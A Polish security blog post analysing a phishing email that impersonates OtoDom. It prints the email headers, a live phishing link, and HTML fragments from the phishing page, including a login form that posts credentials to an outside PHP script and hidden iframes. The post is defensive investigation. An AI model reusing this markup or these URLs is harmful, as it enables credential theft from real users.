O co chodzi przestępcom – zagadka dla Czytelników

dodał 23 marca 2018 o 16:36 w kategorii Info  z tagami:
O co chodzi przestępcom – zagadka dla Czytelników

Czasem trafiamy na internetowe ataki, co do których jesteśmy pewni tylko dwóch rzeczy: tego, że jest to atak, oraz tego, że nie mamy pojęcia, co jest celem atakujących. Czasem zatem na CSI:ZaufanaTrzeciaStrona – ruszajcie do boju.

Zaczyna się jak wiele podobnych historii – po prostu od e-maila. Potem jest mały phishing z dziwnymi wstrzyknięciami kodu, a potem… sami nie wiemy co dalej. Może ktoś z Was będzie miał lepszy pomysł, co jeszcze można sprawdzić i czego poszukać – bo my nigdy wcześniej phishingu na OtoDom nie widzieliśmy.

Wiadomość do ogłoszenia

Taki tytuł nosiła wiadomość, która dotarła do naszego Czytelnika. Wyglądała tak:

Jedynie link „Odpowiedz” prowadzi do innej strony niż oryginalna, a mianowicie do:

http://www.phillyp.com/kboard/data/index.html

Nagłówki wiadomości wyglądają następująco:

Received: from sender-pp-o92.zoho.eu ([31.186.226.252])
          (envelope-sender <[email protected]>)
          by mx.wp.pl (WP-SMTPD) with ECDHE-RSA-AES256-GCM-SHA384 encrypted SMTP
          for <[tu adres odbiorcy]@wp.pl>; 16 Mar 2018 12:56:35 +0100
Received: from mail.zoho.eu by mx.zoho.eu
	with SMTP id 1521201386078946.5229738882373; Fri, 16 Mar 2018 12:56:26 +0100 (CET)
Received: from  [79.214.115.67] by mail.zoho.eu
	with HTTP;Fri, 16 Mar 2018 12:56:26 +0100 (CET)
Received: (wp-smtpd mx.wp.pl 19726 invoked from network); 16 Mar 2018 12:56:35 +0100
From: "www.otodom.pl" <[email protected]>
To: "www.otodom.pl" <[email protected]>
Subject: =?UTF-8?Q?Wiadomo=C5=9B=C4=87_do_og=C5=82oszenia?=
Date: Fri, 16 Mar 2018 12:56:26 +0100
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_001B_01D3C129.11F25370"
X-Mailer: Zoho Mail
Thread-Index: AQKQDFE/ztsfWtJz6K8GFvq0bEmHIw==

Z kolei pod linkiem czeka zwykły phishing:

Wykonaliśmy kopię pełnego kodu źródłowego strony phishingowej na wypadek, gdyby zniknęła – na razie działa. Najciekawsze fragmenty to:

<img width=”1″ height=”1″ style=”border:0″ src=”HTTP://bs.serving-sys.com/Serving/ActivityServer.bs?cn=as&amp;ActivityID=694722&amp;ns=1″/>

<form novalidate=”novalidateid=”loginFormclass=”form form-horizontal form-loginmethod=”postaction=”http://idahoforests.org/card/resources/css/cssgo_down.php„>

<iframe src=”nh1oh0k63yz.js” style=”border: medium none;tabindex=”-1title=”Facebook Cross Domain Communication Framearia-hidden=”trueid=”fb_xdm_frame_httpsscrolling=”noallowfullscreen=”trueallowtransparency=”truename=”fb_xdm_frame_httpsframeborder=”0„></iframe>

<iframe src=”tags_001″ scrolling=”nostyle=”display: none;frameborder=”0height=”1width=”1„></iframe><iframe src=”lsget.html” scrolling=”nostyle=”display: none;frameborder=”0height=”1width=”1„></iframe>

Zagadka

Czy przestępcom chodzi tylko o hasła do serwisu OtoDom? Jeśli tak, to do czego mogą je wykorzystać? Na czym ma polegać przestępstwo?

Jeśli chodzi o coś więcej lub coś innego, to do czego zmierzają ich działania? Liczymy na Waszą dociekliwość!